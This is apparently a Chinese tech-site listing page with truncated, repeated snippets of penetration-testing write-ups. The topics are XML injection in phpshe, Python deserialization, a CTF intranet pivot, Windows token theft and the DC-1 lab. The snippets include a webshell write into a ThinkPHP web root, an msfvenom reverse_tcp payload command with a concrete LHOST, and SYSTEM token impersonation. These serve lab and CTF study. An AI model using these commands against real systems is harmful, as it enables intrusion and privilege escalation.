草庐IT

phpshe xml注入

*php商城系统xml注入***页面样式**Xml原理参考:*https://www.cnblogs.com/20175211lyz/p/11413335.html*漏洞函数simplexml_load_string*转换形式良好的XML字符串为SimpleXMLElement对象,然后输出对象的键和元素,说白了这个函数就是服务器接受客户端xml数据的关键函数。*函数查找**直接在seay审计系统中全局查找该函数**发现*pe_getxml函数调用了漏洞函数再次查找谁调用了pe_getxml发现wechat_getxml文件调用了pe_getxml再次查找谁调用了wechat_getxml函数

python 反序列化

Python-反序列化函数使用pickle.dump(obj,file):将对象序列化后保存到文件pickle.load(file):读取文件,将文件中的序列化内容反序列化为对象pickle.dumps(obj):将对象序列化成字符串格式的字节流pickle.loads(bytes_obj):将字符串格式的字节流反序列化为对象魔术方法:reduce()反序列化时调用reduce_ex()反序列化时调用setstate()反序列化时调用getstate()序列化时调用各类语言函数:Java:SerializableExternalizable接口、fastjson、jackson、gson、Ob

CTF大赛模拟-CFS三层内网漫游

CTF大赛模拟-CFS三层内网漫游环境:三台虚拟机,三个网络。target1:192.168.161.178,192.168.52.132(linux)target2:192.168.52.133,192.168.72.131(linux)target3:192.168.72.132(win7)攻击者只能与target1进行通讯外网打点访问192.168.161.178:80发现是thinkphp5的版本tp漏洞利用用tp5检测工具漏洞存在写入后门:echo''>/www/wwwroot/ThinkPHP/public/x.php蚁剑连接得到第一个flagmsf生成后门msfvenom-pli

WIN进程注入&BypassUAC&令牌窃取

WIN进程注入&BypassUAC&令牌窃取本地提权—win令牌窃取假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。我这里用到了windowns2008虚拟机做演示先用msf生成一个后门msfvenom-pwindows/meterpreter/reverse_tcpLHOST=47.94.236.117LPORT=3333-fexe-omsf.exemsf上线useincognito导入模块list_tokens-u列出进程impersonate_token"NTAUTHORITY\SYSTEM"令牌窃取获得s

DC-1 靶机渗透

DC-1靶机渗透*概况*:下载地址https://www.vulnhub.com/entry/dc-1,292/*官方描述:*DC-1isapurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.Itwasdesignedtobeachallengeforbeginners,butjusthoweasyitiswilldependonyourskillsandknowledge,andyourabilitytolearn.Tosuccessfullycompletethi

phpshe xml注入

*php商城系统xml注入***页面样式**Xml原理参考:*https://www.cnblogs.com/20175211lyz/p/11413335.html*漏洞函数simplexml_load_string*转换形式良好的XML字符串为SimpleXMLElement对象,然后输出对象的键和元素,说白了这个函数就是服务器接受客户端xml数据的关键函数。*函数查找**直接在seay审计系统中全局查找该函数**发现*pe_getxml函数调用了漏洞函数再次查找谁调用了pe_getxml发现wechat_getxml文件调用了pe_getxml再次查找谁调用了wechat_getxml函数

python 反序列化

Python-反序列化函数使用pickle.dump(obj,file):将对象序列化后保存到文件pickle.load(file):读取文件,将文件中的序列化内容反序列化为对象pickle.dumps(obj):将对象序列化成字符串格式的字节流pickle.loads(bytes_obj):将字符串格式的字节流反序列化为对象魔术方法:reduce()反序列化时调用reduce_ex()反序列化时调用setstate()反序列化时调用getstate()序列化时调用各类语言函数:Java:SerializableExternalizable接口、fastjson、jackson、gson、Ob

CTF大赛模拟-CFS三层内网漫游

CTF大赛模拟-CFS三层内网漫游环境:三台虚拟机,三个网络。target1:192.168.161.178,192.168.52.132(linux)target2:192.168.52.133,192.168.72.131(linux)target3:192.168.72.132(win7)攻击者只能与target1进行通讯外网打点访问192.168.161.178:80发现是thinkphp5的版本tp漏洞利用用tp5检测工具漏洞存在写入后门:echo''>/www/wwwroot/ThinkPHP/public/x.php蚁剑连接得到第一个flagmsf生成后门msfvenom-pli

WIN进程注入&BypassUAC&令牌窃取

WIN进程注入&BypassUAC&令牌窃取本地提权—win令牌窃取假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。我这里用到了windowns2008虚拟机做演示先用msf生成一个后门msfvenom-pwindows/meterpreter/reverse_tcpLHOST=47.94.236.117LPORT=3333-fexe-omsf.exemsf上线useincognito导入模块list_tokens-u列出进程impersonate_token"NTAUTHORITY\SYSTEM"令牌窃取获得s

DC-1 靶机渗透

DC-1靶机渗透*概况*:下载地址https://www.vulnhub.com/entry/dc-1,292/*官方描述:*DC-1isapurposelybuiltvulnerablelabforthepurposeofgainingexperienceintheworldofpenetrationtesting.Itwasdesignedtobeachallengeforbeginners,butjusthoweasyitiswilldependonyourskillsandknowledge,andyourabilitytolearn.Tosuccessfullycompletethi